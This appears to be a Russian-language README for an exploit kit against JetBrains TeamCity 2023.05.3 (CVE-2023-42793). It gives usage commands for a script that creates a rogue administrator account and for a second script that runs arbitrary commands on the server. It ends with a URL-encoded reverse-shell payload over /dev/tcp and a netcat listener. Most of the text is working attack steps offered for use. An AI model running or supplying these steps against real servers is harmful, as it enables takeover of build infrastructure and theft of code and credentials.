
JetBrains TeamCity 2023.05.3 - Удаленное выполнение кода (RCE), CVE-2023-42793
сначала используйте
exploit.pyдля создания учётной записи администратора, затем используйтеrce.pyдля выполнения команд на цели. Для получения reverse shell смотрите это
Этот скрипт эксплуатирует уязвимость CVE-2023-42793 для создания учётной записи администратора на сервере TeamCity. Он отправляет POST-запрос на целевой URL для создания пользователя-администратора с указанными или случайными учётными данными.
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]
-u, --url URL: Целевой URL (обязательно)-v, --verbose: Включить подробный режим-n, --username USERNAME: Указать имя пользователя (по умолчанию: случайное)-p, --password PASSWORD: Указать пароль (по умолчанию: случайный)-e, --email EMAIL: Указать email (по умолчанию: случайный)-t, --token-file: Файл для сохранения токенаpip3 install -r requirements.txtЭксплойт со случайным именем пользователя, паролем и email:
python exploit.py -u http://target.com
Эксплойт с указанными именем пользователя, паролем и email:
python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
При успешной эксплуатации скрипт выводит URL, имя пользователя и пароль созданной учётной записи администратора, затем сохраняет результат в файл токена.
Описание Этот скрипт позволяет выполнять команды на уязвимом сервере TeamCity, используя уязвимость CVE-2023-42793. Сначала он включает процессы отладки, а затем выполняет указанную команду через соответствующие конечные точки API.
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
-u, --url URL : Целевой URL (обязательно)-t, --token-file : Указать файл, содержащий токен-c, --command COMMAND: Указать команду для выполнения (RCE)-P, --port PORT: Указать порт (по умолчанию 80)Эксплойт с указанной командой:
python rce.py -u http://target.com -t token -c "whoami"
python3 rce.py -u http://target.com -t token -c '"/bin/bash"¶ms="-c"¶ms="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
nc -nvlp 5555